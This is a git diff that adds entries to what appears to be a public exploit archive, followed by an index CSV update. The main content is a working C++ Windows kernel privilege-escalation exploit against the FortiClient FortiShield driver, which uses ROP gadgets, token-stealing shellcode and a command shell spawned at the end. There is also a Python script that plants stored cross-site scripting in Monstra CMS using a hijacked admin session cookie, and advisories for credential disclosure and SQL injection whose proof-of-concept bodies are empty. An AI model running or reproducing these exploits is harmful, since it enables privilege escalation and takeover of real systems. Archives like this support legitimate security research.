diff --git a/exploits/android/local/44852.txt b/exploits/android/local/44852.txt
new file mode 100644
index 000000000..5a737e378
--- /dev/null
+++ b/exploits/android/local/44852.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Ftp Server 1.32 - Credential Disclosure
+# Date: 2018-05-29
+# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
+# Version: 1.32 Android App
+# Vendor: The Olive Tree
+# Exploit Author: ManhNho
+# CVE: N/A
+# Category: Mobile Apps
+# Tested on: Android 4.4
+
+# Description
+# Ftp Server 1.32 Insecure Data Storage, the result of storing confidential
+# information insecurely on the system i.e. poor encryption, plain text,
+# access control issues etc. Attacker can find out username/password of valid user via
+# /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml
+
+# PoC
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44853.txt b/exploits/php/webapps/44853.txt
new file mode 100644
index 000000000..37ecb04ed
--- /dev/null
+++ b/exploits/php/webapps/44853.txt
@@ -0,0 +1,39 @@
+# Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection
+# Date: 2018-06-07
+# Author: Neven Biruski
+# Software: WordPress Form Maker plugin
+# https://wordpress.org/plugins/form-maker/
+# Version: 1.12.24 and below
+# Vendor Status: Vendor contacted, update released
+
+# The easiest way to reproduce the SQL injection vulnerabilities is to
+# open the presented HTML/JavaScript snippet in your browser while being
+# logged in as administrator or another user that is authorized to
+# access the plugin settings page. Users that do not have full
+# administrative privileges could abuse the database access the
+# vulnerabilities provide to either escalate their privileges or obtain
+# and modify database contents they were not supposed to be able to.
+
+# PoC 1
+
+
+
+
+
+# PoC 2
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44854.txt b/exploits/php/webapps/44854.txt
new file mode 100644
index 000000000..bb2de2f7a
--- /dev/null
+++ b/exploits/php/webapps/44854.txt
@@ -0,0 +1,39 @@
+# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
+# Date: 2018-06-07
+# Author: Neven Biruski
+# Software: WordPress Contact Form Maker plugin
+# Software link: https://wordpress.org/plugins/contact-form-maker/
+# Version: 1.12.20 and below
+
+# The easiest way to reproduce the SQL injection vulnerabilities is to
+# open the presented HTML/JavaScript snippet in your browser while being
+# logged in as administrator or another user that is authorized to
+# access the plugin settings page. Users that do not have full
+# administrative privileges could abuse the database access the
+# vulnerabilities provide to either escalate their privileges or obtain
+# and modify database contents they were not supposed to be able to.
+
+
+# PoC 1
+
+
+
+
+
+# PoC 2
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44855.py b/exploits/php/webapps/44855.py
new file mode 100755
index 000000000..0157fb712
--- /dev/null
+++ b/exploits/php/webapps/44855.py
@@ -0,0 +1,53 @@
+# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
+# Date: 2018-06-07
+# Author: DEEPIN2
+# Software: Monstra CMS
+# Version: 3.0.4 and earlier
+
+import requests
+import re
+
+def runXSS(target, cookie, data):
+ exploit = requests.post(target, cookies=cookie, data=data).text
+ if re.search('exploit', exploit):
+ return 'OK'
+ else:
+ return 'ERROR'
+
+if __name__ == '__main__':
+ print(''' ______ _______ ____ ___ _ ___ _ ___ _ _ ___
+ / ___\ \ / / ____| |___ \ / _ \/ |( _ ) / |/ _ \/ / |( _ )
+| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
+| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
+ \____| \_/ |_____| |_____|\___/|_|\___/ |_|\___/|_|_|\___/
+ [*] Author : DEEPIN2(Junseo Lee)
+---------------------------------------------------------------------''')
+ print('[*] Ex) http://www.target.com -> www.target.com')
+ url = input('Target : ')
+ print('[*] Required admin\'s PHPSESSID.')
+ PHPSESSID = input('PHPSESSID : ')
+ pagename = input('Pagename : ')
+ script = input('Script : ')
+ target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
+ cookie = {'PHPSESSID':PHPSESSID}
+ data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
+ 'page_title':script,\
+ 'page_name':pagename,\
+ 'page_meta_title':'',\
+ 'page_keywords':'',\
+ 'page_description':'',\
+ 'pages':0,\
+ 'templates':'index',\
+ 'status':'published',\
+ 'access':'public',\
+ 'editor':'',\
+ 'page_tags':'',\
+ 'add_page_and_exit':'Save+and+Exit',\
+ 'page_date':'9999-99-99'}
+
+ result = runXSS(target, cookie, data)
+ print('-' * 69)
+ if result == 'OK':
+ print('[+] LINK : http://' + url + '/' + pagename)
+ else:
+ print('[-] Error')
\ No newline at end of file
diff --git a/exploits/windows_x86/local/41705.cpp b/exploits/windows_x86/local/41705.cpp
new file mode 100644
index 000000000..bdd1543e5
--- /dev/null
+++ b/exploits/windows_x86/local/41705.cpp
@@ -0,0 +1,243 @@
+/*
+Check these out:
+- https://www.coresecurity.com/system/files/publications/2016/05/Windows%20SMEP%20bypass%20U%3DS.pdf
+- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
+Tested on:
+- Windows 10 Pro x86 1703/1709
+- ntoskrnl.exe: 10.0.16299.309
+- FortiShield.sys: 5.2.3.633
+Compile:
+- i686-w64-mingw32-g++ forticlient_win10_x86.cpp -o forticlient_win10_x86.exe -m32 -lpsapi
+
+Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
+and m00 to @g0tmi1k <3
+*/
+
+#include
+#include
+#include
+#include
+
+DWORD get_pxe_address_32(DWORD address) {
+
+ DWORD result = address >> 9;
+ result = result | 0xC0000000;
+ result = result & 0xC07FFFF8;
+ return result;
+}
+
+LPVOID GetBaseAddr(char *drvname) {
+
+ LPVOID drivers[1024];
+ DWORD cbNeeded;
+ int nDrivers, i = 0;
+
+ if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
+ char szDrivers[1024];
+ nDrivers = cbNeeded / sizeof(drivers[0]);
+ for (i = 0; i < nDrivers; i++) {
+ if (GetDeviceDriverBaseName(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
+ if (strcmp(szDrivers, drvname) == 0) {
+ return drivers[i];
+ }
+ }
+ }
+ }
+ return 0;
+}
+
+int find_gadget(HMODULE lpFileName, unsigned char search_opcode[], int opcode_size) {
+
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)lpFileName;
+ if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+ printf("[!] Invalid file.\n");
+ exit(1);
+ }
+
+ //Offset of NT Header is found at 0x3c location in DOS header specified by e_lfanew
+ //Get the Base of NT Header(PE Header) = dosHeader + RVA address of PE header
+ PIMAGE_NT_HEADERS ntHeader;
+ ntHeader = (PIMAGE_NT_HEADERS)((ULONGLONG)(dosHeader) + (dosHeader->e_lfanew));
+ if(ntHeader->Signature != IMAGE_NT_SIGNATURE){
+ printf("[!] Invalid PE Signature.\n");
+ exit(1);
+ }
+
+ //Info about Optional Header
+ IMAGE_OPTIONAL_HEADER opHeader;
+ opHeader = ntHeader->OptionalHeader;
+
+ unsigned char *ntoskrnl_buffer = (unsigned char *)malloc(opHeader.SizeOfCode);
+ SIZE_T size_read;
+
+ //ULONGLONG ntoskrnl_code_base = (ULONGLONG)lpFileName + opHeader.BaseOfCode;
+ BOOL rpm = ReadProcessMemory(GetCurrentProcess(), lpFileName, ntoskrnl_buffer, opHeader.SizeOfCode, &size_read);
+ if (rpm == 0) {
+ printf("[!] Error while calling ReadProcessMemory: %d\n", GetLastError());
+ exit(1);
+ }
+
+ int j;
+ int z;
+ DWORD gadget_offset = 0;
+
+ for (j = 0; j < opHeader.SizeOfCode; j++) {
+ unsigned char *gadget = (unsigned char *)malloc(opcode_size);
+ memset(gadget, 0x00, opcode_size);
+ for (z = 0; z < opcode_size; z++) {
+ gadget[z] = ntoskrnl_buffer[j - z];
+ }
+
+ int comparison;
+ comparison = memcmp(search_opcode, gadget, opcode_size);
+ if (comparison == 0) {
+ gadget_offset = j - (opcode_size - 1);
+ }
+ }
+
+ if (gadget_offset == 0) {
+ printf("[!] Error while retrieving the gadget, exiting.\n");
+ exit(1);
+ }
+ return gadget_offset;
+}
+
+LPVOID allocate_shellcode(LPVOID nt, DWORD fortishield_callback, DWORD fortishield_restore, DWORD pte_result, HMODULE lpFileName) {
+
+ HANDLE pid;
+ pid = GetCurrentProcess();
+ DWORD shellcode_address = 0x22ffe000;
+ LPVOID allocate_shellcode;
+ allocate_shellcode = VirtualAlloc((LPVOID *)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ if (allocate_shellcode == NULL) {
+ printf("[!] Error while allocating rop_chain: %d\n", GetLastError());
+ exit(1);
+ }
+
+
+ /** Windows 10 1703 ROPS
+ DWORD rop_01 = (DWORD)nt + 0x002fe484;
+ DWORD rop_02 = 0x00000063;
+ DWORD rop_03 = (DWORD)nt + 0x0002bbef;
+ DWORD rop_04 = (DWORD)pte_result - 0x01;
+ DWORD rop_05 = (DWORD)nt + 0x000f8d49;
+ DWORD rop_06 = 0x41414141;
+ DWORD rop_07 = (DWORD)nt + 0x000e8a46;
+ DWORD rop_08 = 0x2300d1b8;
+ **/
+
+ /** Windows 10 1709 ROPS **/
+ DWORD rop_01 = (DWORD)nt + 0x0002a8c8;
+ DWORD rop_02 = 0x00000063;
+ DWORD rop_03 = (DWORD)nt + 0x0003a3a3;
+ DWORD rop_04 = (DWORD)pte_result - 0x01;
+ DWORD rop_05 = (DWORD)nt + 0x0008da19;
+ DWORD rop_06 = 0x41414141;
+ DWORD rop_07 = (DWORD)nt + 0x001333ce;
+ DWORD rop_08 = 0x2300d1b8;
+
+ char token_steal[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
+ "\x8b\x84\x24\xa0\x00\x00\x00\x31"
+ "\xc9\x89\x08\x31\xc0\x64\x8b\x80"
+ "\x24\x01\x00\x00\x8b\x80\x80\x00"
+ "\x00\x00\x89\xc1\x8b\x80\xb8\x00"
+ "\x00\x00\x2d\xb8\x00\x00\x00\x83"
+ "\xb8\xb4\x00\x00\x00\x04\x75\xec"
+ "\x8b\x90\xfc\x00\x00\x00\x89\x91"
+ "\xfc\x00\x00\x00\x89\xf8\x83\xe8"
+ "\x20\x50\x8b\x84\x24\xa8\x00\x00"
+ "\x00\x5c\x89\x04\x24\x89\xfd\x81"
+ "\xc5\x04\x04\x00\x00\xc2\x04\x00";
+
+ char *shellcode;
+ DWORD shellcode_size = 0x12000;
+ shellcode = (char *)malloc(shellcode_size);
+ memset(shellcode, 0x41, shellcode_size);
+ memcpy(shellcode + 0x2000, &rop_01, 0x04);
+ memcpy(shellcode + 0xf18f, &rop_02, 0x04);
+ memcpy(shellcode + 0xf193, &rop_03, 0x04);
+ memcpy(shellcode + 0xf197, &rop_04, 0x04);
+ memcpy(shellcode + 0xf19b, &rop_05, 0x04);
+ memcpy(shellcode + 0xf19f, &rop_06, 0x04);
+ memcpy(shellcode + 0xf1a3, &rop_07, 0x04);
+ memcpy(shellcode + 0xf1af, &rop_08, 0x04);
+ memcpy(shellcode + 0xf1b8, &token_steal, sizeof(token_steal));
+ memcpy(shellcode + 0xf253, &fortishield_callback, 0x04);
+ memcpy(shellcode + 0xf257, &fortishield_restore, 0x04);
+
+
+ BOOL WPMresult;
+ SIZE_T written;
+ WPMresult = WriteProcessMemory(pid, (LPVOID)shellcode_address, shellcode, shellcode_size, &written);
+ if (WPMresult == 0)
+ {
+ printf("[!] Error while calling WriteProcessMemory: %d\n", GetLastError());
+ exit(1);
+ }
+ printf("[+] Memory allocated at: %p\n", allocate_shellcode);
+ return allocate_shellcode;
+}
+
+DWORD trigger_callback() {
+
+ printf("[+] Creating dummy file\n");
+ system("echo test > test.txt");
+
+ printf("[+] Calling MoveFileEx()\n");
+ BOOL MFEresult;
+ MFEresult = MoveFileEx((LPCSTR)"test.txt", (LPCSTR)"test2.txt", MOVEFILE_REPLACE_EXISTING);
+ if (MFEresult == 0)
+ {
+ printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
+ return 1;
+ }
+ return 0;
+}
+
+int main() {
+
+ HANDLE forti;
+ forti = CreateFile((LPCSTR)"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+ if (forti == INVALID_HANDLE_VALUE) {
+ printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
+ return 1;
+ }
+
+ HMODULE ntoskrnl = LoadLibrary((LPCSTR)"C:\\Windows\\System32\\ntoskrnl.exe");
+ if (ntoskrnl == NULL) {
+ printf("[!] Error while loading ntoskrnl: %d\n", GetLastError());
+ exit(1);
+ }
+
+ LPVOID nt = GetBaseAddr((char *)"ntoskrnl.exe");
+ LPVOID fortishield_base = GetBaseAddr((char *)"FortiShield.sys");
+
+ DWORD va_pte = get_pxe_address_32(0x2300d000);
+ DWORD pivot = (DWORD)nt + 0x0009b8eb;
+ DWORD fortishield_callback = (DWORD)fortishield_base + 0xba70;
+ DWORD fortishield_restore = (DWORD)fortishield_base + 0x1e95;
+
+ printf("[+] KERNEL found at: %llx\n", (DWORD)nt);
+ printf("[+] FortiShield.sys found at: %llx\n", (DWORD)fortishield_base);
+ printf("[+] PTE virtual address at: %llx\n", va_pte);
+
+ LPVOID shellcode_allocation;
+ shellcode_allocation = allocate_shellcode(nt, fortishield_callback, fortishield_restore, va_pte, ntoskrnl);
+
+ DWORD IoControlCode = 0x220028;
+ DWORD InputBuffer = pivot;
+ DWORD InputBufferLength = 0x4;
+ DWORD OutputBuffer = 0x0;
+ DWORD OutputBufferLength = 0x0;
+ DWORD lpBytesReturned;
+
+ //DebugBreak();
+
+ BOOL triggerIOCTL;
+ triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
+ trigger_callback();
+
+ system("start cmd.exe");
+
+ return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 343b49a8c..80fef3870 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5988,8 +5988,8 @@ id,file,description,date,author,type,platform,port
44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
-44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
-44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
+44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
+44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@@ -9490,8 +9490,8 @@ id,file,description,date,author,type,platform,port
41887,exploits/windows/local/41887.txt,"VirusChaser 8.0 - Local Buffer Overflow (SEH)",2017-04-14,0x41Li,local,windows,
42305,exploits/linux/local/42305.txt,"NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation",2017-07-10,"Paul Taylor",local,linux,
41886,exploits/linux/local/41886.c,"Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation",2017-04-15,"Nassim Asrir",local,linux,
-41721,exploits/windows_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
-41722,exploits/windows_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
+41721,exploits/windows_x86-64/local/41721.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
+41722,exploits/windows_x86-64/local/41722.c,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation",2017-03-25,sickness,local,windows_x86-64,
41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,
41754,exploits/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Local Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",local,hardware,
41760,exploits/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,local,linux,
@@ -9767,6 +9767,8 @@ id,file,description,date,author,type,platform,port
44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
+41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
+44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39513,3 +39515,6 @@ id,file,description,date,author,type,platform,port
44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
+44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
+44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting Automation",2018-06-07,DEEPIN2,webapps,php,